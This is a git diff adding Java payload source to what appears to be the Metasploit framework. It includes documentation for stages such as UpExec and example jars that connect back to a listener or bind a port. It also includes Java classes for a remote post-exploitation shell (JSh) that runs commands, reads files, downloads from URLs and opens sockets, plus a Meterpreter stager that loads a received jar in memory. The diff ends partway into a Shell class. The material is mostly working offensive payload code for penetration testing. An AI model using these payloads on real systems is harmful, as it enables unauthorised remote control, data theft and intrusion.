+	<dd>Not supported</dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>Plain text</dd>
+</dl>
+
+<p>This stage just returns some system and network information. The
+input stream is ignored. Useful as an embedded stage for automatic data
+gathering with <tt>netcat</tt>, but not useful for anything else.</p>
+
+<h3><tt>UpExec</tt></h3>
+<dl>
+	<dt><b>Stage classes</b></dt>
+	<dd>javapayload.stage.Stage, javapayload.stage.StreamForwarder,
+	javapayload.stage.UpExec</dd>
+</dl>
+<dl>
+	<dt><b>Parameters</b></dt>
+	<dd><b>UpExec</b> <i>program_name</i> <i>arguments</i></dd>
+</dl>
+<dl>
+	<dt><b>Stage protocol</b></dt>
+	<dd>raw Input/output streams</dd>
+</dl>
+
+<p>Acts like exec, just that the a file can be uploaded first
+(stored with a random file name) which will be executed with parameters.</p>
+
+<p>The file is uploaded directly after uploading the stage classes,
+prefixed by a 32-bit big-endian integer size value.</p>
+
+<h2>Included example jars</h2>
+
+<h3><tt>example-reverse-meterpreter.jar</tt></h3>
+
+<p>Will connect back to metasploit at localhost:4444. and try to
+bootstrap meterpreter (via an embedded stage). Except for the hard-coded
+address in the property file, it acts like <i>loader.jar</i>.</p>
+
+<h3><tt>example-spawn-bind.jar</tt></h3>
+
+<p>Will spawn 2 Java processes and then listen on port 5555 for
+incoming connections. No embedded stages.</p>
+
+<h3><tt>example-standalone-jsh.jar</tt></h3>
+
+<p>Will run JSh on stdin/stdout. Example for the stdin/stdout
+feature and useful for testing JSh easily.</p>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLConnection.java b/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLConnection.java
new file mode 100644
index 0000000000..7548421e99
--- /dev/null
+++ b/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLConnection.java
@@ -0,0 +1,68 @@
+package com.metasploit.meterpreter;
+
+import java.io.ByteArrayInputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Field;
+import java.net.MalformedURLException;
+import java.net.URL;
+import java.net.URLConnection;
+import java.util.ArrayList;
+import java.util.Hashtable;
+import java.util.List;
+
+/**
+ * An {@link URLConnection} for an URL that is stored completely in memory.
+ * 
+ * @author mihi
+ */
+public class MemoryBufferURLConnection extends URLConnection {
+
+	private static List files = new ArrayList();
+
+	static {
+		// tweak the cache of already loaded protocol handlers via reflection
+		try {
+			Field fld = URL.class.getDeclaredField("handlers");
+			fld.setAccessible(true);
+			Hashtable handlers = (Hashtable) fld.get(null);
+			handlers.put("metasploitmembuff", new MemoryBufferURLStreamHandler());
+		} catch (Exception ex) {
+			throw new RuntimeException(ex.toString());
+		}
+	}
+
+	/**
+	 * Create a new URL from a byte array and its content type.
+	 */
+	public static URL createURL(byte[] data, String contentType) throws MalformedURLException {
+		files.add(data);
+		return new URL("metasploitmembuff", "", (files.size() - 1) + "/" + contentType);
+	}
+
+	private final byte[] data;
+	private final String contentType;
+
+	protected MemoryBufferURLConnection(URL url) {
+		super(url);
+		String file = url.getFile();
+		int pos = file.indexOf('/');
+		data = (byte[]) files.get(Integer.parseInt(file.substring(0, pos)));
+		contentType = file.substring(pos + 1);
+	}
+
+	public void connect() throws IOException {
+	}
+
+	public InputStream getInputStream() throws IOException {
+		return new ByteArrayInputStream(data);
+	}
+
+	public int getContentLength() {
+		return data.length;
+	}
+
+	public String getContentType() {
+		return contentType;
+	}
+}
diff --git a/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.java b/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.java
new file mode 100644
index 0000000000..99757cce2d
--- /dev/null
+++ b/external/source/javapayload/src/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.java
@@ -0,0 +1,17 @@
+package com.metasploit.meterpreter;
+
+import java.io.IOException;
+import java.net.URL;
+import java.net.URLConnection;
+import java.net.URLStreamHandler;
+
+/**
+ * An {@link URLStreamHandler} for a {@link MemoryBufferURLConnection}
+ * 
+ * @author mihi
+ */
+public class MemoryBufferURLStreamHandler extends URLStreamHandler {
+	protected URLConnection openConnection(URL u) throws IOException {
+		return new MemoryBufferURLConnection(u);
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/Exec.java b/external/source/javapayload/src/javapayload/stage/Exec.java
new file mode 100644
index 0000000000..8b8a8fa440
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/Exec.java
@@ -0,0 +1,60 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+public class Exec implements Stage {
+
+	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+		for (int i = 0; i < parameters.length; i++) {
+			if (parameters[i].equals("--")) {
+				// separator found. The next parameter will be the module name, and
+				// all remaining parameters are for exec.
+				final String[] cmdarray = new String[parameters.length - i - 2];
+				System.arraycopy(parameters, i + 2, cmdarray, 0, cmdarray.length);
+				final Process proc = Runtime.getRuntime().exec(cmdarray);
+				new StreamForwarder(in, proc.getOutputStream(), out).start();
+				new StreamForwarder(proc.getInputStream(), out, out).start();
+				new StreamForwarder(proc.getErrorStream(), out, out).start();
+				proc.waitFor();
+				in.close();
+				out.close();
+				break;
+			}
+		}
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/JSh.java b/external/source/javapayload/src/javapayload/stage/JSh.java
new file mode 100644
index 0000000000..a197421d58
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/JSh.java
@@ -0,0 +1,346 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.io.PipedInputStream;
+import java.io.PipedOutputStream;
+import java.io.PrintStream;
+import java.net.Socket;
+import java.net.URL;
+import java.util.ArrayList;
+import java.util.Enumeration;
+import java.util.List;
+
+public class JSh implements Stage, Runnable {
+
+	// each job is an Object[] to avoid a pure data class
+	// job[0] = name (String)
+	// job[1] = raw object (Socket or Process or Stream) for closing
+	// job[2] = OutputStream to forward user input to
+	// job[3..length-1] = JshStreamForwarders to redirect output
+	private final List jobs = new ArrayList();
+
+	private PipedOutputStream signalStream;
+	private InputStream originalIn;
+	private PrintStream pout;
+
+	/**
+	 * Forward data from one stream to another. Closes the input stream but not the output stream!
+	 */
+	private void forward(InputStream in, OutputStream out) throws IOException {
+		final byte[] buf = new byte[4096];
+		int len;
+		while ((len = in.read(buf)) != -1) {
+			out.write(buf, 0, len);
+			if (in.available() == 0) {
+				out.flush();
+			}
+		}
+		in.close();
+	}
+
+	private boolean forwardEscapable(InputStream in, Object[] job) throws IOException {
+		final OutputStream out = (OutputStream) job[2];
+		int b;
+		boolean startOfLine = true, tilde = false, interrupted = true;
+		while (true) {
+			if (interrupted && job.length > 3) {
+				boolean allFinished = true;
+				for (int i = 3; i < job.length; i++) {
+					if (!((JShStreamForwarder) job[i]).isFinished()) {
+						allFinished = false;
+						break;
+					}
+				}
+				if (allFinished) {
+					pout.println("Finished: " + job[0]);
+					return false;
+				}
+			}
+			interrupted = false;
+			if ((b = in.read()) != -1) {
+				if (b == 0) {
+					b = in.read();
+					if (b != 0) {
+						interrupted = true;
+						continue;
+					}
+				}
+				if (startOfLine && b == '~') {
+					tilde = true;
+				} else if (tilde && b == '&') {
+					return true;
+				} else if (tilde && b == '.') {
+					return false;
+				} else {
+					if (tilde && b != '~') {
+						out.write('~');
+					}
+					out.write(b);
+					if (in.available() == 0) {
+						out.flush();
+					}
+					tilde = false;
+				}
+				startOfLine = (b == '\r' || b == '\n');
+			} else {
+				// our control connection has died...
+				return false;
+			}
+		}
+	}
+
+	private void handleBackgroundJob(DataInputStream in, Object[] job) throws Exception {
+		pout.println("Press ~& to suspend, ~. to stop job.");
+		for (int i = 3; i < job.length; i++) {
+			((JShStreamForwarder) job[i]).pauseForwarding(false);
+		}
+		if (forwardEscapable(in, job)) {
+			for (int i = 3; i < job.length; i++) {
+				((JShStreamForwarder) job[i]).pauseForwarding(true);
+			}
+			jobs.add(job);
+			pout.println("Job suspended, see 'jobs'.");
+		} else {
+			for (int i = 3; i < job.length; i++) {
+				((JShStreamForwarder) job[i]).stopForwarding();
+			}
+			if (job[1] instanceof Socket) {
+				((Socket) job[1]).close();
+			} else if (job[1] instanceof Process) {
+				((Process) job[1]).destroy();
+			} else {
+				((OutputStream) job[1]).close();
+			}
+		}
+	}
+
+	public void run() {
+		try {
+			try {
+				int b;
+				while ((b = originalIn.read()) != -1) {
+					signalStream.write(b);
+					if (b == 0) {
+						signalStream.write(b);
+					}
+					if (originalIn.available() == 0) {
+						signalStream.flush();
+					}
+				}
+			} finally {
+				originalIn.close();
+				signalStream.close();
+			}
+		} catch (final Throwable ex) {
+			ex.printStackTrace(pout);
+		}
+	}
+
+	public void start(DataInputStream originalIn, OutputStream out, String[] parameters) throws Exception {
+		this.originalIn = originalIn;
+		signalStream = new PipedOutputStream();
+		pout = new PrintStream(out, true);
+		final DataInputStream in = new DataInputStream(new PipedInputStream(signalStream));
+		final Thread copier = new Thread(this);
+		copier.setDaemon(true);
+		copier.start();
+		final JShSignalSender ss = new JShSignalSender(signalStream, pout);
+		File pwd = new File(".").getCanonicalFile();
+		while (true) {
+			pout.print("! ");
+			// yes I know this is deprecated. but BufferedReader is way too bloated for what we need here
+			String cmd = in.readLine();
+			while (cmd.indexOf("\0$") != -1) {
+				cmd = cmd.substring(0, cmd.indexOf("\0$")) + cmd.substring(cmd.indexOf("\0$") + 2);
+			}
+			if (cmd.length() == 0) {
+				continue;
+			}
+			int pos = cmd.indexOf(' ');
+			String params = "";
+			if (pos != -1) {
+				params = cmd.substring(pos + 1);
+				cmd = cmd.substring(0, pos);
+			}
+			cmd = cmd.toLowerCase().intern();
+			try {
+				if (cmd == "info") {
+					if (params.length() == 0) {
+						final Enumeration e = System.getProperties().propertyNames();
+						while (e.hasMoreElements()) {
+							final String property = (String) e.nextElement();
+							pout.println(property + "=" + System.getProperty(property));
+						}
+					} else {
+						pout.println(params + "=" + System.getProperty(params));
+					}
+				} else if (cmd == "pwd") {
+					pout.println(pwd.getPath());
+				} else if (cmd == "cd") {
+					File f = new File(pwd, params);
+					if (f.exists() && f.isDirectory()) {
+						pwd = f.getCanonicalFile();
+					} else {
+						f = new File(params);
+						if (f.exists() && f.isDirectory()) {
+							pwd = f.getCanonicalFile();
+						} else {
+							pout.println("Path not found.");
+						}
+					}
+					pout.println(pwd.getPath());
+				} else if (cmd == "ls") {
+					final File[] roots = File.listRoots();
+					for (int i = 0; i < roots.length; i++) {
+						pout.println(roots[i].getAbsolutePath() + "\t[ROOT]");
+					}
+					pout.println();
+					final File[] dir = pwd.listFiles();
+					for (int i = 0; i < dir.length; i++) {
+						pout.println(dir[i].getName() + "\t" + (dir[i].isDirectory() ? "[DIR]" : "" + dir[i].length()) + "\t" + dir[i].lastModified());
+					}
+				} else if (cmd == "exec") {
+					Process proc;
+					handleBackgroundJob(in, new Object[] { "exec " + params, proc = Runtime.getRuntime().exec(params), proc.getOutputStream(), new JShStreamForwarder(proc.getInputStream(), pout, ss), new JShStreamForwarder(proc.getErrorStream(), pout, ss) });
+				} else if (cmd == "cat") {
+					final FileInputStream fis = new FileInputStream(new File(pwd, params));
+					forward(fis, pout);
+				} else if (cmd == "wget") {
+					pos = params.indexOf(' ');
+					if (pos == -1) {
+						pout.println("  Usage: wget <URL> <filename>");
+					} else {
+						final FileOutputStream fos = new FileOutputStream(new File(pwd, params.substring(pos + 1)));
+						forward(new URL(params.substring(0, pos)).openStream(), fos);
+						fos.close();
+					}
+				} else if (cmd == "telnet") {
+					pos = params.indexOf(' ');
+					if (pos == -1) {
+						pout.println("  Usage: telnet <host> <port>");
+					} else {
+						Socket s;
+						handleBackgroundJob(in, new Object[] { "telnet " + params, s = new Socket(params.substring(0, pos), Integer.parseInt(params.substring(pos + 1))), s.getOutputStream(), new JShStreamForwarder(s.getInputStream(), pout, ss) });
+					}
+				} else if (cmd == "paste") {
+					FileOutputStream fos;
+					handleBackgroundJob(in, new Object[] { "paste " + params, fos = new FileOutputStream(new File(pwd, params)), fos });
+				} else if (cmd == "jobs") {
+					if (params.length() == 0) {
+						for (int i = 0; i < jobs.size(); i++) {
+							pout.println((i + 1) + "\t" + ((Object[]) jobs.get(i))[0]);
+						}
+					} else {
+						handleBackgroundJob(in, (Object[]) jobs.remove(Integer.parseInt(params) - 1));
+					}
+				} else if (cmd == "exit") {
+					break;
+				} else if (cmd == "help") {
+					params = params.toLowerCase().intern();
+					if (params == "info") {
+						pout.println("info: show system properties.");
+						pout.println("  Usage: info [property]");
+					} else if (params == "pwd") {
+						pout.println("pwd: show current directory.");
+						pout.println("  Usage: pwd");
+					} else if (params == "cd") {
+						pout.println("cd: change directory.");
+						pout.println("  Usage: cd <path>");
+					} else if (params == "ls") {
+						pout.println("ls: list directory.");
+						pout.println("  Usage: ls");
+					} else if (params == "exec") {
+						pout.println("exec: execute native command.");
+						pout.println("  Usage: exec <command>");
+					} else if (params == "cat") {
+						pout.println("cat: show text file.");
+						pout.println("  Usage: cat <filename>");
+					} else if (params == "wget") {
+						pout.println("wget: download file.");
+						pout.println("  Usage: wget <URL> <filename>");
+					} else if (params == "telnet") {
+						pout.println("telnet: create TCP connection.");
+						pout.println("  Usage: telnet <host> <port>");
+					} else if (params == "paste") {
+						pout.println("paste: create text file.");
+						pout.println("  Usage: paste <filename>");
+					} else if (params == "jobs") {
+						pout.println("jobs: list or continue jobs.");
+						pout.println("  Usage: jobs [index]");
+					} else if (params == "exit") {
+						pout.println("exit: Exit JSh.");
+						pout.println("  Usage: exit");
+					} else {
+						pout.println("help: show information about commands.");
+						pout.println("  Usage: help [command]");
+						pout.println();
+						pout.println("Supported commands:");
+						pout.println("    help   - show this help");
+						pout.println("    info   - list system properties");
+						pout.println("    pwd    - show current directory");
+						pout.println("    cd     - change directory");
+						pout.println("    ls     - list directory");
+						pout.println("    exec   - execute native command");
+						pout.println("    cat    - show text file");
+						pout.println("    wget   - download file");
+						pout.println("    telnet - create TCP connection");
+						pout.println("    paste  - create text file");
+						pout.println("    jobs   - list or continue jobs");
+						pout.println("    exit   - Exit JSh");
+						pout.println();
+						pout.println("When inside an interactive command, enter ~. on a new");
+						pout.println("line to exit from that command. Enter ~& to background the command.");
+						pout.println("Enter ~~ to start a line with a ~ character");
+					}
+				} else {
+					pout.println("Unknown command: " + cmd);
+					pout.println("Type help for more info.");
+				}
+			} catch (final Exception ex) {
+				ex.printStackTrace(pout);
+			}
+		}
+		ss.terminate();
+		pout.close();
+	}
+}
\ No newline at end of file
diff --git a/external/source/javapayload/src/javapayload/stage/JShSignalSender.java b/external/source/javapayload/src/javapayload/stage/JShSignalSender.java
new file mode 100644
index 0000000000..4d427fe7e8
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/JShSignalSender.java
@@ -0,0 +1,84 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.PipedOutputStream;
+import java.io.PrintStream;
+
+/**
+ * For some strange reason {@link PipedOutputStream} assumes something bad[tm] happened if a thread which wrote last to it dies without closing it. Therefore, we send all the "process dead" signals to the output stream via a dedicated thread that does not end before Jsh ends...
+ */
+public class JShSignalSender extends Thread {
+	private final PipedOutputStream signalStream;
+	private boolean doSignal, doTerminate;
+	private final PrintStream errorStream;
+
+	public JShSignalSender(PipedOutputStream signalStream, PrintStream errorStream) {
+		this.signalStream = signalStream;
+		this.errorStream = errorStream;
+		start();
+	}
+
+	public void run() {
+		try {
+			while (true) {
+				synchronized (this) {
+					while (!doSignal && !doTerminate) {
+						wait();
+					}
+					if (doTerminate) {
+						break;
+					}
+					doSignal = false;
+				}
+				signalStream.write(new byte[] { 0, '$' });
+				signalStream.flush();
+			}
+			signalStream.close();
+		} catch (final Throwable ex) {
+			ex.printStackTrace(errorStream);
+		}
+	}
+
+	public synchronized void signal() {
+		doSignal = true;
+		notifyAll();
+	}
+
+	public synchronized void terminate() {
+		doTerminate = true;
+		notifyAll();
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/JShStreamForwarder.java b/external/source/javapayload/src/javapayload/stage/JShStreamForwarder.java
new file mode 100644
index 0000000000..12dbc43c2d
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/JShStreamForwarder.java
@@ -0,0 +1,108 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.InputStream;
+import java.io.PrintStream;
+
+public class JShStreamForwarder extends Thread {
+	private final InputStream in;
+	private PrintStream out;
+	private boolean paused = false, finished = false;
+	private final JShSignalSender signalSender;
+
+	public JShStreamForwarder(InputStream in, PrintStream out, JShSignalSender signalSender) {
+		this.in = in;
+		this.out = out;
+		this.signalSender = signalSender;
+		start();
+	}
+
+	public synchronized boolean isFinished() {
+		return finished;
+	}
+
+	public synchronized void pauseForwarding(boolean paused) {
+		this.paused = paused;
+		this.notifyAll();
+	}
+
+	public void run() {
+		try {
+			try {
+				final byte[] buf = new byte[4096];
+				int length;
+				while ((length = in.read(buf)) != -1) {
+					synchronized (this) {
+						while (paused) {
+							wait();
+						}
+						if (out != null) {
+							out.write(buf, 0, length);
+							if (in.available() == 0) {
+								out.flush();
+							}
+						}
+					}
+				}
+				synchronized (this) {
+					finished = true;
+					if (!paused) {
+						signalSender.signal();
+					}
+				}
+			} finally {
+				in.close();
+			}
+		} catch (final Throwable ex) {
+			synchronized (this) {
+				while (paused) {
+					try {
+						wait();
+					} catch (final InterruptedException ex2) {
+					}
+				}
+				if (out != null) {
+					ex.printStackTrace(out);
+					out.flush();
+				}
+			}
+		}
+	}
+
+	public synchronized void stopForwarding() {
+		out = null;
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/Meterpreter.java b/external/source/javapayload/src/javapayload/stage/Meterpreter.java
new file mode 100644
index 0000000000..850d767458
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/Meterpreter.java
@@ -0,0 +1,25 @@
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+import java.net.URL;
+import java.net.URLClassLoader;
+
+import com.metasploit.meterpreter.MemoryBufferURLConnection;
+
+/**
+ * Meterpreter Java Payload Proxy
+ */
+public class Meterpreter implements Stage {
+
+	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+		boolean noRedirectError = parameters[parameters.length-1].equals("NoRedirect");
+		int coreLen = in.readInt();
+		byte[] core = new byte[coreLen];
+		in.readFully(core);
+		URL coreURL = MemoryBufferURLConnection.createURL(core, "application/jar");
+		new URLClassLoader(new URL[] { coreURL }, getClass().getClassLoader()).loadClass("com.metasploit.meterpreter.Meterpreter").getConstructor(new Class[] { DataInputStream.class, OutputStream.class, boolean.class, boolean.class }).newInstance(new Object[] { in, out, Boolean.TRUE, new Boolean(!noRedirectError) });
+		in.close();
+		out.close();
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/SendParameters.java b/external/source/javapayload/src/javapayload/stage/SendParameters.java
new file mode 100644
index 0000000000..997ad23093
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/SendParameters.java
@@ -0,0 +1,53 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
+ * HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
+ * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
+ * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
+ * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
+ * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+package javapayload.stage;
+
+import java.io.DataInputStream;
+import java.io.OutputStream;
+
+public class SendParameters implements Stage {
+
+	public void start(DataInputStream in, OutputStream out, String[] parameters) throws Exception {
+		int paramCount = in.readUnsignedShort();
+		String[] params = new String[paramCount+2];
+		params[0] = parameters[0];
+		params[1] = "--";
+		for (int i = 2; i < params.length; i++) {
+			params[i] = in.readUTF(); 
+		}
+		Stage realStage = (Stage) Class.forName("javapayload.stage."+params[2]).newInstance();
+		realStage.start(in, out, params);
+	}
+}
diff --git a/external/source/javapayload/src/javapayload/stage/Shell.java b/external/source/javapayload/src/javapayload/stage/Shell.java
new file mode 100644
index 0000000000..5402809234
--- /dev/null
+++ b/external/source/javapayload/src/javapayload/stage/Shell.java
@@ -0,0 +1,56 @@
+/*
+ * Java Payloads.
+ * 
+ * Copyright (c) 2010, Michael 'mihi' Schierl
+ * All rights reserved.
+ * 
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 
+ * - Redistributions of source code must retain the above copyright notice,
+ *   this list of conditions and the following disclaimer.
+ *   
+ * - Redistributions in binary form must reproduce the above copyright
+ *   notice, this list of conditions and the following disclaimer in the
+ *   documentation and/or other materials provided with the distribution.
+ *   
+ * - Neither name of the copyright holders nor the names of its
+ *   contributors may be used to endorse or promote products derived from
+ *   this software without specific prior written permission.
+ *   
+ * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND THE CONTRIBUTORS
+ * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+ * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
+ * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
